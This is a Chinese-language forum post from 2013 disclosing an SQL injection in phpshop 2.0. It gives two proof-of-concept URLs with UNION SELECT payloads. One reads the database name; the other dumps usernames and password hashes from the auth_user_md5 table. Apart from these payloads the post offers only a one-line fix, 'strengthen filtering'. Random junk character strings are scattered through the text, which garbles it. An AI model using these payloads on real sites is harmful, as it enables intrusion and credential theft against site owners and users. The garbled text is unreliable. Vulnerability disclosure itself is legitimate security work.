标题 : phpshop 2.0 SQL Injection Vulnerability4 ]7 D4 m; a* n8 P& i
5 ]( V. D6 e A- Z1 u& ~, l
作者 : By onestree
6 G* h1 G; x, v1 B6 B" _ l3 F, C5 e下载地址 : http://code.google.com/p/phpshop/downloads/list, |4 P) Z0 t ^8 Q: L; n# h( q& ]
测试地址: windows 7 / ubuntu
3 @1 [! G7 U+ K$ z# h/ u! |
1 p) ?3 u9 H) C: g/ g7 H: A% m - O+ Y' F+ J9 k( _8 u! h
SQLi p0c:# O7 x- h9 s, I) W& O0 `
) x% o k8 ~" W9 O4 k: v1 M==================1 j! k2 l* q0 N$ q1 m3 h" N7 j: r* ?6 N+ i
* e4 a+ N* n b: Uhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'0 s3 v2 o9 p h- \5 e* O
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --) k" X7 N% | N/ ^8 ]
+ ^2 y* w- e: G" ]( C
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
) A l; t' _ w% a2 U
. f m3 B( C6 c0 T& O修复:
9 v' h0 Z4 c6 m8 p& s8 z# Q加强过滤
: ]0 W) y4 L7 j) t+ t% s9 ^* f9 c a- w+ P" [
+ X d7 ]6 R) c4 {8 S |
发表于 2013-1-18 18:24:10
收藏
分享
支持
反对